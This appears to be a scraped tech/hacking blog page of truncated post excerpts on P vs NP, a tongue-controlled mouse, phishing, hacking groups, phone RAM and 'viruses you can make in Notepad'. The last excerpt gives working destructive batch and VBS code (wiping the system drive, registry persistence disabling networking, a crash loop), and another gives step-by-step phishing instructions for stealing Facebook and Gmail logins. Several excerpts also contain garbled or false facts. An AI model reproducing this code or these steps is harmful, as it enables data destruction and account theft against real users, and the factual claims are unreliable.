Posts

Prove This Math Equation to Hack The Entire Digital world !

In mathematics, there are several complexity classes for the problems. If you can solve a problem in polynomial time (we can predict the maximum amount of time it will take to solve the problem), such problem will be called ‘ P-class ‘ problem. But, if you are not sure about the solution in polynomial time, such problem will be called ‘ NP-class ‘ problem.  P class  is the set of problems that can be solved in polynomial time.  NP  is the set of problems whose solutions can not be determined but can be verified in polynomial time. Here, the first two paragraphs are about  NP-class  problems. Ok, I know that you are reading this article to know about that magical equation which, once proved, can break all the existing security protocols of the internet. In fact, the  Clay Institute  is offering one million dollars for a solution to the problem. So let’s talk about the equation which I considered you might be interested in. Is P=NP? Yes, tw...

School Girl Invented a Way to Control a Computer with Your Tongue

A Schoolgirl from Canada, Emma Mogus has invented an innovative input device that can control a mouse using the language. It will allow people with disabilities and people with hand injuries to use the computer. According to the University of Alabama, there are now more than 250 million Americans have a serious spinal cord injury. An estimated 118 thousand of them are paralyzed arms and legs. Using a computer for these people is a big problem. The inventors have repeatedly tried to help the disabled, offering solutions for computer control using brain waves and eye movements. However, Emma Mogus has developed a simple and convenient way to replace the mouse – to use human language instead of his hands. Emma is only 17 years old, she is studying in 12 class of high school in Oakville. His invention is shown May 12 at the International Science and Engineering Fair Intel. In addition to Emma in the fair was attended by more than 1,750 school and university students ...

HOW TO MAKE A PHISHING PAGE ??

What is Z-Shadow? Z-Shadow is a website specially designed for hacking Facebook and other social site like  Facebook , Gmail  and many more. You just need to create an account on that website and have to copy the URL of the site which your victim uses. For example if you want to hack Facebook then you just need to copy the URL of fake Facebook page. Don’t worry no account bans or suspended because Z-Shadow is especially created for hacking. All you need to do is that copy the URL of the site (phishing page) and send that to your victim. And remember Facebook does not block the fake URL it is the specialty of Z-Shadow. Because z shadow url are regularly replaced with new ones. Disclaimer:  My dear visitors this article is just for the sake of education so please do not use this method to hack into someone’s account hacking is an illegal activity. To Learn Hacking Facebook Using Z-Shadow Just Follow The Following Steps: Step 1:  Go to your favorite brow...

Top 10 Most Notorious Hacking Groups In The World Ever !

#1 Anonymous The Father of all hacking groups, The almighty’s messengers are back with the mask of  Anonymous.  The group is very famous among hackers too. After an open challenge to  ISIS , they became the primary shield in the cyber world. It is spread worldwide but still the united group. They stand against the injustice, keeping their mask on faces. They Never forget, They never forgive. #2 Lizard Squad Lizard Squad  is an online active hacking group. The main victims of their attacks are the High profile websites, e.g. Banks, Airline websites, Facebook etc. Once they Hack the  Malaysian  Airline website and redirect all the users to a page saying, “ Plane Not Found! “.  Facebook has always denied the fact of being hacked, but the down servers for sometimes indicate the  DDOS attack  by Lizard Squad. They like to grab the bigger fishes. #3 Chaos Computer Club The Group Started in Berlin, 1980’s. They ...

Why does the iPhone require less RAM than Android devices?

Why does the iPhone require less RAM than Android devices? It involves many factors. Basically the Garbage collection, App Management, User Interface, and Hardware. 1. Garbage collection In the case of Android, since it involves garbage collection it requires more memory. The Android apps use Java and as a result, Android does garbage collection. The problem with garbage collection is that memory usage grows until it’s collected, so there might be more memory allocated than necessary. That’s bad for devices with restricted memory and no option to swap. When the garbage collector runs, it scans the heap to find memory that’s no longer being used, and that’s an expensive process, that slows down the device until is has completed. The iPhone do not use Garbage Collection. It uses  Automatic Reference Counting , which is an innovative way of managing Objective-C objects on iOS. It does away with explicit retain, release and autorelease messages, and it behaves the ...

DANGEROUS VIRUSES CODES FOR PC YOU CAN MAKE IN NOTEPAD

Image
This Virus Deletes All The Content Of A Drive… @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 Save The Above Code as  happy.bat >>Disable Internet Permanently Save As A bat File echo @echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo You Have Been HACKED! PAUSE >>The Most Simple Virus To Crush The Window @Echo off Del C:\ *.* |y Save It As game.bat >> This Will Crash Ur Computer Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next Save It As Anything.vbs It Only Works With Windows...